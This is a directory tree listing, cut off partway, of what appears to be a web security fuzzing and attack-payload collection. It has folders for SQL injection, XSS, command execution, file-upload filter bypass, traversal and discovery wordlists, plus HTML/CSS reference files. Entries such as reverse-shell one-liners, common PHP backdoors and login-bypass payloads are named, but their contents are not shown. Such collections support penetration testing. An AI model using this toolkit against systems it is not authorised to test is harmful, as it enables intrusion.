├── _config.yml ├── _copyright.txt ├── _readme.txt ├── attack-payloads ├── BizLogic │ ├── CommonMethods.fuzz.txt │ └── DebugParams.fuzz.txt ├── all-attacks │ ├── all-attacks-unix.txt │ ├── all-attacks-win.txt │ └── interesting-metacharacters.txt ├── control-chars │ ├── URIhex.fuzz.txt │ └── null.fuzz.txt ├── disclosure-directory │ ├── directory-indexing-generic.fuzz.txt │ └── source-directory-file-indexing-cheatsheet.html ├── disclosure-localpaths │ └── unix │ │ └── common-unix-httpd-log-locations.txt ├── disclosure-source │ ├── source-disc-cmd-exec-traversal.txt │ ├── source-disclosure-generic.txt │ └── source-disclosure-microsoft.txt ├── file-upload │ ├── alt-extensions-asp.txt │ ├── alt-extensions-coldfusion.txt │ ├── alt-extensions-jsp.txt │ ├── alt-extensions-perl.txt │ ├── alt-extensions-php.txt │ ├── file-ul-filter-bypass-commonly-writable-directories.txt │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt │ ├── file-ul-filter-bypass-microsoft-asp.txt │ ├── file-ul-filter-bypass-ms-php.txt │ ├── file-ul-filter-bypass-x-platform-generic.txt │ ├── file-ul-filter-bypass-x-platform-php.txt │ ├── file-ul-filter-bypass.readme │ ├── invalid-filenames-linux.txt │ ├── invalid-filenames-microsoft.txt │ ├── invalid-filesystem-chars-microsoft.txt │ └── invalid-filesystem-chars-osx.txt ├── format-strings │ └── format-strings.txt ├── html_fuzz │ ├── html_tags.txt │ └── javascript_events.txt ├── http-protocol │ ├── crlf-injection.fuzz.txt │ ├── crlf-notes.txt │ ├── docs.http-method-defs.html │ ├── hpp.fuzz.txt │ ├── http-header-cache-poison.txt │ ├── http-protocol-methods.txt │ ├── http-request-header-field-names.txt │ ├── http-response-header-field-names.txt │ ├── known-uri-types.fuzz │ └── user-agents.txt ├── integer-overflow │ └── integer-overflows.txt ├── ldap │ ├── ldap-injection.fuzz.txt │ └── ldap.readme.txt ├── lfi │ ├── common-unix-httpd-log-locations.txt │ ├── common-windows-files.txt │ └── readme.txt ├── os-cmd-execution │ ├── LinuxCommands.fuzz.txt │ ├── OSCommandInject.Windows.fuzz.txt │ ├── OSXCommands.fuzz.txt │ ├── WindowsCommands.fuzz.txt │ ├── WindowsPowershell.fuzz.txt │ ├── command-execution-unix.txt │ ├── commands-unix.txt │ ├── commands-windows.txt │ ├── docs │ │ └── command-execution-cheatsheat-unix.txt │ ├── reverse-shell-one-liners.doc.txt │ └── source-disc-cmd-exec-traversal.txt ├── os-dir-indexing │ └── directory-indexing.txt ├── path-traversal │ ├── path-traversal-windows.txt │ └── traversals-8-deep-exotic-encoding.txt ├── rfi │ ├── readme.txt │ ├── rfi-cheatsheet.html │ └── rfi.txt ├── server-side-include │ └── server-side-includes-generic.txt ├── sql-injection │ ├── detect │ │ ├── GenericBlind.fuzz.txt │ │ ├── MSSQL.fuzz.txt │ │ ├── MSSQL_blind.fuzz.txt │ │ ├── MySQL.fuzz.txt │ │ ├── MySQL_MSSQL.fuzz.txt │ │ ├── docs │ │ │ ├── docs.oracle_cheat.pdf │ │ │ └── docs.sql_injection_cheatsheet.html │ │ ├── oracle.fuzz.txt │ │ └── xplatform.fuzz.txt │ ├── exploit │ │ ├── db2-enumeration.txt │ │ ├── ms-sql-enumeration.txt │ │ ├── mysql-injection-login-bypass.txt │ │ ├── mysql-read-local-files.txt │ │ └── postgres-enumeration.txt │ └── payloads-sql-blind │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ ├── payloads-sql-blind-MySQL-WHERE.txt │ │ └── readme.txt ├── xml │ └── xml-attacks.txt ├── xpath │ ├── xpath-injection.fuzz.txt │ └── xpath.readme.txt └── xss │ ├── all-encodings-of-lt.fuzz.txt │ ├── default-javascript-event-attributes.fuzz.txt │ ├── docs.wasc-scriptmapping │ ├── ScriptMapping_Release_26Nov2007.html │ ├── images │ │ ├── ff2.png │ │ ├── ie7.png │ │ └── safari3.png │ └── license.txt │ ├── xss-other.txt │ ├── xss-rsnake.txt │ └── xss-uri.txt ├── discovery ├── DNS │ ├── CcTLD.txt │ ├── dnsmapCommonSubdomains.txt │ └── gTLD.txt ├── FilenameBruteforce │ ├── 3CharExtBrute.fuzz.txt │ ├── Extensions.Backup.fuzz.txt │ ├── Extensions.Common.fuzz.txt │ ├── Extensions.Compressed.fuzz.txt │ ├── Extensions.Mostcommon.fuzz.txt │ ├── Extensions.Skipfish.fuzz.txt │ ├── WordlistSkipfish.fuzz.txt │ └── copy_of.fuzz.txt ├── MimeTypes │ └── MimeTypes.txt ├── PredictableRes │ ├── AdobeXML.fuzz.txt │ ├── Apache.fuzz.txt │ ├── ApacheTomcat.fuzz.txt │ ├── CGI_HTTP_POST.fuzz.txt │ ├── CGI_HTTP_POST_Windows.fuzz.txt │ ├── CGI_Microsoft.fuzz.txt │ ├── CGI_XPlatform.fuzz.txt │ ├── CMS │ │ ├── drupal_plugins.fuzz.txt │ │ ├── drupal_themes.fuzz.txt │ │ ├── joomla_plugins.fuzz.txt │ │ ├── joomla_themes.fuzz.txt │ │ ├── php-nuke.fuzz.txt │ │ ├── readme.txt │ │ ├── wordpress.fuzz.txt │ │ ├── wp_common_theme_files.fuzz.php │ │ ├── wp_plugins.fuzz.txt │ │ ├── wp_plugins_top225.fuzz.txt │ │ ├── wp_themes.fuzz.readme │ │ └── wp_themes.fuzz.txt │ ├── ColdFusion.fuzz.txt │ ├── FatwireCMS.fuzz.txt │ ├── Frontpage.fuzz.txt │ ├── HTTP_POST_Microsoft.fuzz.txt │ ├── Hyperion.fuzz.txt │ ├── IIS.fuzz.txt │ ├── JBoss.fuzz.txt │ ├── JRun.fuzz.txt │ ├── JavaServlets_Common.fuzz.txt │ ├── KitchensinkDirectories.fuzz.txt │ ├── Logins.fuzz.txt │ ├── LotusNotes.fuzz.txt │ ├── Netware.fuzz.txt │ ├── Oracle9i.fuzz.txt │ ├── OracleAppServer.fuzz.txt │ ├── PHP.fuzz.txt │ ├── PHP_CommonBackdoors.fuzz.txt │ ├── Passwords.fuzz.txt │ ├── Randomfiles.fuzz.txt │ ├── SAP.fuzz.txt │ ├── Sharepoint.fuzz.txt │ ├── SiteMinder.fuzz.txt │ ├── SunAppServerGlassfish.fuzz.txt │ ├── SuniPlanet.fuzz.txt │ ├── UnixDotfiles.fuzz.txt │ ├── UserAgents.fuzz.txt │ ├── Vignette.fuzz.txt │ ├── Weblogic.fuzz.txt │ ├── Websphere.fuzz.txt │ ├── proxy-conf.fuzz.txt │ ├── raft-large-directories-lowercase.txt │ ├── raft-large-directories.txt │ ├── raft-large-extensions-lowercase.txt │ ├── raft-large-extensions.txt │ ├── raft-large-files-lowercase.txt │ ├── raft-large-files.txt │ ├── raft-large-words-lowercase.txt │ ├── raft-large-words.txt │ ├── raft-medium-directories-lowercase.txt │ ├── raft-medium-directories.txt │ ├── raft-medium-extensions-lowercase.txt │ ├── raft-medium-extensions.txt │ ├── raft-medium-files-lowercase.txt │ ├── raft-medium-files.txt │ ├── raft-medium-words-lowercase.txt │ ├── raft-medium-words.txt │ ├── raft-small-directories-lowercase.txt │ ├── raft-small-directories.txt │ ├── raft-small-extensions-lowercase.txt │ ├── raft-small-extensions.txt │ ├── raft-small-files-lowercase.txt │ ├── raft-small-files.txt │ ├── raft-small-words-lowercase.txt │ ├── raft-small-words.txt │ └── tftp.fuzz.txt └── UserAgent │ ├── UserAgentListCommon.txt │ └── UserAgentListLarge.txt ├── docs └── misc │ ├── KL0209LIT_fffap.html │ ├── Web-Shells-rev2.pdf │ ├── Wireshark_Display_Filters.pdf │ ├── html-element-index │ ├── color │ │ ├── colors.htm │ │ ├── hexcalc.htm │ │ ├── safetypalette.htm │ │ ├── uiname.htm │ │ ├── vganame.htm │ │ ├── x11alpha.htm │ │ └── x11redirect.htm │ ├── css │ │ ├── examples │ │ │ ├── cssembedded.htm │ │ │ ├── cssexternal.htm │ │ │ ├── csshtmlxmp.htm │ │ │ ├── cssinline.htm │ │ │ └── examples.htm │ │ ├── index.html │ │ ├── index10.htm │ │ ├── index2.htm │ │ ├── index3.htm │ │ ├── index4.htm │ │ ├── index5.htm │ │ ├── index6.htm │ │ ├── index7.htm │ │ ├── index9.htm │ │ ├── properties │ │ │ ├── aural.htm │ │ │ ├── aural │ │ │ │ ├── azimuth.htm │ │ │ │ ├── cue.htm │ │ │ │ ├── cueaft.htm │ │ │ │ ├── cuebef.htm │ │ │ │ ├── elevation.htm │ │ │ │ ├── pause.htm │ │ │ │ ├── pauseaft.htm │ │ │ │ ├── pausebef.htm │ │ │ │ ├── pitch.htm │ │ │ │ ├── pitchrange.htm │ │ │ │ ├── playdur.htm │ │ │ │ ├── richness.htm │ │ │ │ ├── speak.htm │ │ │ │ ├── speaknum.htm │ │ │ │ ├── speakpunc.htm │ │ │ │ ├── speakrate.htm │ │ │ │ ├── stress.htm │ │ │ │ ├── voicefam.htm │ │ │ │ └── volume.htm │ │ │ ├── border.htm │ │ │ ├── border │ │ │ │ ├── bbcolor.htm │ │ │ │ ├── bbottom.htm │ │ │ │ ├── bbstyle.htm │ │ │ │ ├── bbwidth.htm │ │ │ │ ├── bcolor.htm │ │ │ │ ├── blcolor.htm │ │ │ │ ├── bleft.htm │ │ │ │ ├── blstyle.htm │ │ │ │ ├── blwidth.htm │ │ │ │ ├── border.htm │ │ │ │ ├── brcolor.htm │ │ │ │ ├── bright.htm │ │ │ │ ├── brstyle.htm │ │ │ │ ├── brwidth.htm │ │ │ │ ├── bstyle.htm │ │ │ │ ├── btcolor.htm │ │ │ │ ├── btop.htm │ │ │ │ ├── btstyle.htm │ │ │ │ ├── btwidth.htm │ │ │ │ └── bwidth.htm │ │ │ ├── classify.htm │ │ │ ├── classify │ │ │ │ ├── clear.htm │ │ │ │ ├── display.htm │ │ │ │ ├── float.htm │ │ │ │ ├── position.htm │ │ │ │ └── visibility.htm │ │ │ ├── colorbg.htm │ │ │ ├── colorbg │ │ │ │ ├── bg.htm │ │ │ │ ├── bgattach.htm │ │ │ │ ├── bgcolor.htm │ │ │ │ ├── bgimage.htm │ │ │ │ ├── bgposit.htm │ │ │ │ ├── bgpositx.htm │ │ │ │ ├── bgposity.htm │ │ │ │ ├── bgrepeat.htm │ │ │ │ ├── color.htm │ │ │ │ ├── lbgcolor.htm │ │ │ │ └── lbgimage.htm │ │ │ ├── dimension.htm │ │ │ ├── dimension │ │ │ │ ├── height.htm │ │ │ │ ├── lineheight.htm │ │ │ │ ├── maxheight.htm │ │ │ │ ├── maxwidth.htm │ │ │ │ ├── minheight.htm │ │ │ │ ├── minwidth.htm │ │ │ │ └── width.htm │ │ │ ├── dynamic.htm │ │ │ ├── dynamic │ │ │ │ ├── accelerator.htm │ │ │ │ ├── behavior.htm │ │ │ │ ├── cursor.htm │ │ │ │ ├── filter.htm │ │ │ │ ├── revealtranssyntax.htm │ │ │ │ ├── visualsyntax.htm │ │ │ │ └── zoom.htm │ │ │ ├── extensions │ │ │ │ ├── nsextensions.htm │ │ │ │ └── operaextensions.htm │ │ │ ├── font.htm │ │ │ ├── font │ │ │ │ ├── font.htm │ │ │ │ ├── fontfamily.htm │ │ │ │ ├── fontsize.htm │ │ │ │ ├── fontsizeadjust.htm │ │ │ │ ├── fontstretch.htm │ │ │ │ ├── fontstyle.htm │ │ │ │ ├── fontvariant.htm │ │ │ │ └── fontweight.htm │ │ │ ├── generate.htm │ │ │ ├── generate │ │ │ │ ├── content.htm │ │ │ │ ├── counterinc.htm │ │ │ │ ├── counterreset.htm │ │ │ │ ├── incsource.htm │ │ │ │ └── quotes.htm │ │ │ ├── international.htm │ │ │ ├── intl │ │ │ │ ├── direction.htm │ │ │ │ ├── imemode.htm │ │ │ │ ├── lflow.htm │ │ │ │ ├── lgchar.htm │ │ │ │ ├── lgcharspace.htm │ │ │ │ ├── lgline.htm │ │ │ │ ├── lgmode.htm │ │ │ │ ├── lgrid.htm │ │ │ │ ├── lgtype.htm │ │ │ │ ├── linebreak.htm │ │ │ │ ├── ralign.htm │ │ │ │ ├── roverhang.htm │ │ │ │ ├── rposition.htm │ │ │ │ ├── textaspace.htm │ │ │ │ ├── textjustify.htm │ │ │ │ ├── textkspace.htm │ │ │ │ ├── unibidi.htm │ │ │ │ ├── wordbreak.htm │ │ │ │ └── writingmode.htm │ │ │ ├── list.htm │ │ │ ├── list │ │ │ │ ├── liststyle.htm │ │ │ │ ├── lsimage.htm │ │ │ │ ├── lsposition.htm │ │ │ │ ├── lstype.htm │ │ │ │ └── markeroff.htm │ │ │ ├── margin.htm │ │ │ ├── margin │ │ │ │ ├── margin.htm │ │ │ │ ├── marginbot.htm │ │ │ │ ├── marginleft.htm │ │ │ │ ├── marginright.htm │ │ │ │ └── margintop.htm │ │ │ ├── outline.htm │ │ │ ├── outline │ │ │ │ ├── outcolor.htm │ │ │ │ ├── outline.htm │ │ │ │ ├── outstyle.htm │ │ │ │ └── outwidth.htm │ │ │ ├── padding.htm │ │ │ ├── padding │ │ │ │ ├── padding.htm │ │ │ │ ├── paddingbot.htm │ │ │ │ ├── paddingleft.htm │ │ │ │ ├── paddingright.htm │ │ │ │ └── paddingtop.htm │ │ │ ├── position.htm │ │ │ ├── position │ │ │ │ ├── bottom.htm │ │ │ │ ├── clip.htm │ │ │ │ ├── left.htm │ │ │ │ ├── overflow.htm │ │ │ │ ├── overflowx.htm │ │ │ │ ├── overflowy.htm │ │ │ │ ├── right.htm │ │ │ │ ├── textoverflow.htm │ │ │ │ ├── top.htm │ │ │ │ ├── vertalign.htm │ │ │ │ └── zindex.htm │ │ │ ├── print.htm │ │ │ ├── print │ │ │ │ ├── marks.htm │ │ │ │ ├── orphans.htm │ │ │ │ ├── page.htm │ │ │ │ ├── pbafter.htm │ │ │ │ ├── pbbefore.htm │ │ │ │ ├── pbinside.htm │ │ │ │ ├── size.htm │ │ │ │ └── widows.htm │ │ │ ├── scrollbar.htm │ │ │ ├── scrollbar │ │ │ │ ├── scrollbar3dlc.htm │ │ │ │ ├── scrollbarac.htm │ │ │ │ ├── scrollbarbc.htm │ │ │ │ ├── scrollbardsc.htm │ │ │ │ ├── scrollbarfc.htm │ │ │ │ ├── scrollbarhc.htm │ │ │ │ ├── scrollbarsc.htm │ │ │ │ └── scrollbartc.htm │ │ │ ├── table.htm │ │ │ ├── table │ │ │ │ ├── bcollapse.htm │ │ │ │ ├── bspace.htm │ │ │ │ ├── capside.htm │ │ │ │ ├── emptycell.htm │ │ │ │ ├── speakhead.htm │ │ │ │ └── tlayout.htm │ │ │ ├── text.htm │ │ │ └── text │ │ │ │ ├── letterspace.htm │ │ │ │ ├── textalign.htm │ │ │ │ ├── textalignlast.htm │ │ │ │ ├── textdec.htm │ │ │ │ ├── textindent.htm │ │ │ │ ├── textshadow.htm │ │ │ │ ├── texttrans.htm │ │ │ │ ├── textunderpos.htm │ │ │ │ ├── whitespace.htm │ │ │ │ ├── wordspace.htm │ │ │ │ └── wordwrap.htm │ │ ├── propindex │ │ │ ├── all.htm │ │ │ ├── aural.htm │ │ │ ├── border.htm │ │ │ ├── classify.htm │ │ │ ├── colorbg.htm │ │ │ ├── dimension.htm │ │ │ ├── dynamic.htm │ │ │ ├── extensions.htm │ │ │ ├── font.htm │ │ │ ├── generate.htm │ │ │ ├── international.htm │ │ │ ├── list.htm │ │ │ ├── margin.htm │ │ │ ├── outline.htm │ │ │ ├── padding.htm │ │ │ ├── position.htm │ │ │ ├── print.htm │ │ │ ├── scrollbar.htm │ │ │ ├── table.htm │ │ │ └── text.htm │ │ ├── supportkey │ │ │ ├── aural.htm │ │ │ ├── border.htm │ │ │ ├── classify.htm │ │ │ ├── colorbg.htm │ │ │ ├── dimension.htm │ │ │ ├── dynamic.htm │ │ │ ├── extensions.htm │ │ │ ├── font.htm │ │ │ ├── generate.htm │ │ │ ├── international.htm │ │ │ ├── list.htm │ │ │ ├── margin.htm │ │ │ ├── outline.htm │ │ │ ├── padding.htm │ │ │ ├── position.htm │ │ │ ├── print.htm │ │ │ ├── scrollbar.htm │ │ │ ├── syntax.htm │ │ │ ├── table.htm │ │ │ ├── text.htm │ │ │ └── units.htm │ │ ├── syntax │ │ │ ├── atrules │ │ │ │ ├── atrules.htm │ │ │ │ ├── charset.htm │ │ │ │ ├── fontdef.htm │ │ │ │ ├── fontface.htm │ │ │ │ ├── import.htm │ │ │ │ ├── media.htm │ │ │ │ ├── namespace.htm │ │ │ │ └── page.htm │ │ │ ├── declaration.htm │ │ │ ├── generalbugs.htm │ │ │ ├── inclusion │ │ │ │ ├── embedded.htm │ │ │ │ ├── external.htm │ │ │ │ ├── inclusion.htm │ │ │ │ └── inline.htm │ │ │ ├── misc.htm │ │ │ ├── pseudo │ │ │ │ ├── pclassactive.htm │ │ │ │ ├── pclasscanvas.htm │ │ │ │ ├── pclassempty.htm │ │ │ │ ├── pclassfirstchild.htm │ │ │ │ ├── pclassfirstlr.htm │ │ │ │ ├── pclassfirstnode.htm │ │ │ │ ├── pclassfocus.htm │ │ │ │ ├── pclasshover.htm │ │ │ │ ├── pclasslang.htm │ │ │ │ ├── pclasslastchild.htm │ │ │ │ ├── pclasslastnode.htm │ │ │ │ ├── pclasslink.htm │ │ │ │ ├── pclassnot.htm │ │ │ │ ├── pclassroot.htm │ │ │ │ ├── pclassscrolledcontent.htm │ │ │ │ ├── pclassviewport.htm │ │ │ │ ├── pclassviewportscroll.htm │ │ │ │ ├── pclassvisited.htm │ │ │ │ ├── pelemafter.htm │ │ │ │ ├── pelembefore.htm │ │ │ │ ├── pelemfirstletter.htm │ │ │ │ ├── pelemfirstline.htm │ │ │ │ ├── pelemselection.htm │ │ │ │ ├── pseudoclass.htm │ │ │ │ └── pseudoelement.htm │ │ │ ├── selectors │ │ │ │ ├── attribute.htm │ │ │ │ ├── element.htm │ │ │ │ ├── selectors.htm │ │ │ │ └── spechtml.htm │ │ │ ├── syntax.htm │ │ │ └── units │ │ │ │ ├── abslength.htm │ │ │ │ ├── angle.htm │ │ │ │ ├── color.htm │ │ │ │ ├── frequency.htm │ │ │ │ ├── rellength.htm │ │ │ │ ├── time.htm │ │ │ │ ├── units.htm │ │ │ │ └── url.htm │ │ └── topics │ │ │ ├── cascade.htm │ │ │ ├── inherit.htm │ │ │ ├── media.htm │ │ │ ├── related.htm │ │ │ └── stylefaq.htm │ ├── history │ │ ├── browsers.htm │ │ ├── browsers2.htm │ │ ├── browsers3.htm │ │ ├── browsers4.htm │ │ ├── browsers5.htm │ │ ├── browsers6.htm │ │ ├── browsers7.htm │ │ ├── browsers8.htm │ │ ├── css.htm │ │ ├── css1.htm │ │ ├── css2.htm │ │ ├── css21.htm │ │ ├── css3.htm │ │ ├── html.htm │ │ ├── html20.htm │ │ ├── html30.htm │ │ ├── html32.htm │ │ ├── html40.htm │ │ ├── ie.htm │ │ ├── macie.htm │ │ ├── mosaic.htm │ │ ├── netscape.htm │ │ ├── opera.htm │ │ ├── xhtml.htm │ │ ├── xhtml10.htm │ │ ├── xhtml11.htm │ │ └── xhtml20.htm │ ├── html │ │ ├── index.html │ │ ├── index10.htm │ │ ├── index2.htm │ │ ├── index3.htm │ │ ├── index4.htm │ │ ├── index5.htm │ │ ├── index6.htm │ │ ├── index7.htm │ │ ├── index9.htm │ │ ├── supportkey │ │ │ ├── a.htm │ │ │ ├── b.htm │ │ │ ├── bang.htm │ │ │ ├── c.htm │ │ │ ├── d.htm │ │ │ ├── e.htm │ │ │ ├── f.htm │ │ │ ├── h.htm │ │ │ ├── i.htm │ │ │ ├── input.htm │ │ │ ├── k.htm │ │ │ ├── l.htm │ │ │ ├── m.htm │ │ │ ├── n.htm │ │ │ ├── o.htm │ │ │ ├── p.htm │ │ │ ├── q.htm │ │ │ ├── r.htm │ │ │ ├── s.htm │ │ │ ├── t.htm │ │ │ ├── u.htm │ │ │ ├── v.htm │ │ │ ├── w.htm │ │ │ └── x.htm │ │ ├── tagindex │ │ │ ├── a.htm │ │ │ ├── all.htm │ │ │ ├── b.htm │ │ │ ├── bang.htm │ │ │ ├── c.htm │ │ │ ├── d.htm │ │ │ ├── e.htm │ │ │ ├── f.htm │ │ │ ├── h.htm │ │ │ ├── i.htm │ │ │ ├── k.htm │ │ │ ├── l.htm │ │ │ ├── m.htm │ │ │ ├── n.htm │ │ │ ├── o.htm │ │ │ ├── p.htm │ │ │ ├── q.htm │ │ │ ├── r.htm │ │ │ ├── s.htm │ │ │ ├── t.htm │ │ │ ├── u.htm │ │ │ ├── v.htm │ │ │ ├── w.htm │ │ │ └── x.htm │ │ ├── tagpages │ │ │ ├── a │ │ │ │ ├── a-bookmark.htm │ │ │ │ ├── a-hyperlink.htm │ │ │ │ ├── abbr.htm │ │ │ │ ├── acronym.htm │ │ │ │ ├── address.htm │ │ │ │ ├── applet.htm │ │ │ │ └── area.htm │ │ │ ├── attributes │ │ │ │ ├── accessibility.htm │ │ │ │ ├── accesskey.htm │ │ │ │ ├── class.htm │ │ │ │ ├── contenteditable.htm │ │ │ │ ├── core.htm │ │ │ │ ├── data.htm │ │ │ │ ├── datafld.htm │ │ │ │ ├── dataformatas.htm │ │ │ │ ├── datasrc.htm │ │ │ │ ├── dir.htm │ │ │ │ ├── disabled.htm │ │ │ │ ├── editing.htm │ │ │ │ ├── events.htm │ │ │ │ ├── events1.htm │ │ │ │ ├── events10.htm │ │ │ │ ├── events12.htm │ │ │ │ ├── events13.htm │ │ │ │ ├── events14.htm │ │ │ │ ├── events15.htm │ │ │ │ ├── events16.htm │ │ │ │ ├── events2.htm │ │ │ │ ├── events4.htm │ │ │ │ ├── events5.htm │ │ │ │ ├── events6.htm │ │ │ │ ├── events7.htm │ │ │ │ ├── events8.htm │ │ │ │ ├── events9.htm │ │ │ │ ├── hidefocus.htm │ │ │ │ ├── id.htm │ │ │ │ ├── lang.htm │ │ │ │ ├── language.htm │ │ │ │ ├── language2.htm │ │ │ │ ├── onabort.htm │ │ │ │ ├── onafterupdate.htm │ │ │ │ ├── onbeforeactivate.htm │ │ │ │ ├── onbeforeeditfocus.htm │ │ │ │ ├── onbeforeunload.htm │ │ │ │ ├── onbeforeupdate.htm │ │ │ │ ├── onblur.htm │ │ │ │ ├── oncellchange.htm │ │ │ │ ├── onchange.htm │ │ │ │ ├── onclick.htm │ │ │ │ ├── oncontextmenu.htm │ │ │ │ ├── ondblclick.htm │ │ │ │ ├── ondragdrop.htm │ │ │ │ ├── ondragstart.htm │ │ │ │ ├── onerror.htm │ │ │ │ ├── onerrorupdate.htm │ │ │ │ ├── onfilterchange.htm │ │ │ │ ├── onfocus.htm │ │ │ │ ├── onhelp.htm │ │ │ │ ├── oninput.htm │ │ │ │ ├── onload.htm │ │ │ │ ├── onlosecapture.htm │ │ │ │ ├── onmousemove.htm │ │ │ │ ├── onmouseout.htm │ │ │ │ ├── onmouseover.htm │ │ │ │ ├── onmousewheel.htm │ │ │ │ ├── onmove.htm │ │ │ │ ├── onpropertychange.htm │ │ │ │ ├── onreadystatechange.htm │ │ │ │ ├── onreset.htm │ │ │ │ ├── onresize.htm │ │ │ │ ├── onscroll.htm │ │ │ │ ├── onselect.htm │ │ │ │ ├── onselectstart.htm │ │ │ │ ├── onstop.htm │ │ │ │ ├── onsubmit.htm │ │ │ │ ├── onunload.htm │ │ │ │ ├── style.htm │ │ │ │ ├── tabindex.htm │ │ │ │ ├── title.htm │ │ │ │ └── unselectable.htm │ │ │ ├── b │ │ │ │ ├── base.htm │ │ │ │ ├── basefont.htm │ │ │ │ ├── bdo.htm │ │ │ │ ├── bgsound.htm │ │ │ │ ├── big.htm │ │ │ │ ├── blink.htm │ │ │ │ ├── blockquote.htm │ │ │ │ ├── body.htm │ │ │ │ ├── bold.htm │ │ │ │ ├── break.htm │ │ │ │ └── button.htm │ │ │ ├── block.htm │ │ │ ├── c │ │ │ │ ├── caption.htm │ │ │ │ ├── center.htm │ │ │ │ ├── charents.htm │ │ │ │ ├── cite.htm │ │ │ │ ├── code.htm │ │ │ │ ├── col.htm │ │ │ │ ├── colgroup.htm │ │ │ │ ├── comment.htm │ │ │ │ └── conditblock.htm │ │ │ ├── character.htm │ │ │ ├── d │ │ │ │ ├── del.htm │ │ │ │ ├── dfn.htm │ │ │ │ ├── dir.htm │ │ │ │ ├── div.htm │ │ │ │ ├── dl.htm │ │ │ │ ├── doctype.htm │ │ │ │ └── dtdd.htm │ │ │ ├── e │ │ │ │ ├── em.htm │ │ │ │ └── embed.htm │ │ │ ├── embed.htm │ │ │ ├── entities │ │ │ │ ├── arrow.htm │ │ │ │ ├── charentity0-31.htm │ │ │ │ ├── charentity127-159.htm │ │ │ │ ├── charentity160-191.htm │ │ │ │ ├── charentity192-223.htm │ │ │ │ ├── charentity224-255.htm │ │ │ │ ├── charentity32-64.htm │ │ │ │ ├── charentity65-96.htm │ │ │ │ ├── charentity97-126.htm │ │ │ │ ├── genpunctuation1.htm │ │ │ │ ├── genpunctuation2.htm │ │ │ │ ├── greekcapitals.htm │ │ │ │ ├── greeksmalls.htm │ │ │ │ ├── math.htm │ │ │ │ ├── miscletters.htm │ │ │ │ ├── miscshapes.htm │ │ │ │ ├── misctechnical.htm │ │ │ │ └── spacebidi.htm │ │ │ ├── f │ │ │ │ ├── fieldset.htm │ │ │ │ ├── font.htm │ │ │ │ ├── form.htm │ │ │ │ ├── frame.htm │ │ │ │ └── frameset.htm │ │ │ ├── forms.htm │ │ │ ├── frameset.htm │ │ │ ├── h │ │ │ │ ├── head.htm │ │ │ │ ├── heading.htm │ │ │ │ ├── hr.htm │ │ │ │ └── html.htm │ │ │ ├── head.htm │ │ │ ├── hyperlinks.htm │ │ │ ├── i │ │ │ │ ├── i.htm │ │ │ │ ├── iframe.htm │ │ │ │ ├── ilayer.htm │ │ │ │ ├── image.htm │ │ │ │ ├── inlineinput.htm │ │ │ │ ├── inputbutton.htm │ │ │ │ ├── inputcheck.htm │ │ │ │ ├── inputfile.htm │ │ │ │ ├── inputhidden.htm │ │ │ │ ├── inputimage.htm │ │ │ │ ├── inputpassword.htm │ │ │ │ ├── inputradio.htm │ │ │ │ ├── inputrange.htm │ │ │ │ ├── inputreadonly.htm │ │ │ │ ├── inputreset.htm │ │ │ │ ├── inputsubmit.htm │ │ │ │ ├── inputtext.htm │ │ │ │ ├── ins.htm │ │ │ │ └── isindex.htm │ │ │ ├── k │ │ │ │ ├── kbd.htm │ │ │ │ └── keygen.htm │ │ │ ├── l │ │ │ │ ├── label.htm │ │ │ │ ├── layer.htm │ │ │ │ ├── legend.htm │ │ │ │ ├── li.htm │ │ │ │ ├── link.htm │ │ │ │ └── listing.htm │ │ │ ├── linebreak.htm │ │ │ ├── lists.htm │ │ │ ├── m │ │ │ │ ├── map.htm │ │ │ │ ├── marquee.htm │ │ │ │ ├── menu.htm │ │ │ │ ├── meta.htm │ │ │ │ ├── metauses.htm │ │ │ │ └── multicol.htm │ │ │ ├── misc.htm │ │ │ ├── multimedia.htm │ │ │ ├── n │ │ │ │ ├── nextid.htm │ │ │ │ ├── nobr.htm │ │ │ │ ├── noembed.htm │ │ │ │ ├── noframes.htm │ │ │ │ ├── nolayer.htm │ │ │ │ └── noscript.htm │ │ │ ├── o │ │ │ │ ├── object.htm │ │ │ │ ├── ol.htm │ │ │ │ ├── optgroup.htm │ │ │ │ └── option.htm │ │ │ ├── obsolete.htm │ │ │ ├── p │ │ │ │ ├── p.htm │ │ │ │ ├── param.htm │ │ │ │ ├── plaintext.htm │ │ │ │ └── pre.htm │ │ │ ├── positioning.htm │ │ │ ├── q │ │ │ │ └── q.htm │ │ │ ├── r │ │ │ │ ├── rb.htm │ │ │ │ ├── rbc.htm │ │ │ │ ├── rp.htm │ │ │ │ ├── rt.htm │ │ │ │ ├── rtc.htm │ │ │ │ └── ruby.htm │ │ │ ├── revision.htm │ │ │ ├── rubies.htm │ │ │ ├── s │ │ │ │ ├── samp.htm │ │ │ │ ├── script.htm │ │ │ │ ├── select.htm │ │ │ │ ├── small.htm │ │ │ │ ├── sound.htm │ │ │ │ ├── spacer.htm │ │ │ │ ├── span.htm │ │ │ │ ├── spell.htm │ │ │ │ ├── strike.htm │ │ │ │ ├── strong.htm │ │ │ │ ├── style.htm │ │ │ │ ├── sub.htm │ │ │ │ └── sup.htm │ │ │ ├── shorthands.htm │ │ │ ├── stats.htm │ │ │ ├── t │ │ │ │ ├── table.htm │ │ │ │ ├── tbody.htm │ │ │ │ ├── text.htm │ │ │ │ ├── textarea.htm │ │ │ │ ├── tfoot.htm │ │ │ │ ├── thead.htm │ │ │ │ ├── thtd.htm │ │ │ │ ├── title.htm │ │ │ │ ├── tr.htm │ │ │ │ └── tt.htm │ │ │ ├── tables.htm │ │ │ ├── target.htm │ │ │ ├── text.htm │ │ │ ├── u │ │ │ │ ├── u.htm │ │ │ │ └── ul.htm │ │ │ ├── v │ │ │ │ └── var.htm │ │ │ ├── w │ │ │ │ └── wbr.htm │ │ │ └── x │ │ │ │ ├── xml.htm │ │ │ │ └── xmp.htm │ │ ├── topics │ │ │ ├── bodycssmapping.htm │ │ │ ├── breakframe.htm │ │ │ ├── frameborders.htm │ │ │ ├── hiding.htm │ │ │ ├── indent.htm │ │ │ ├── mailto.htm │ │ │ ├── naturalsize.htm │ │ │ ├── selectwidth.htm │ │ │ ├── starting.htm │ │ │ ├── uastring-navobj.htm │ │ │ ├── urlencoding.htm │ │ │ └── windowopen.htm │ │ └── tree │ │ │ ├── anchors.htm │ │ │ ├── block.htm │ │ │ ├── body.htm │ │ │ ├── character.htm │ │ │ ├── embed.htm │ │ │ ├── forms.htm │ │ │ 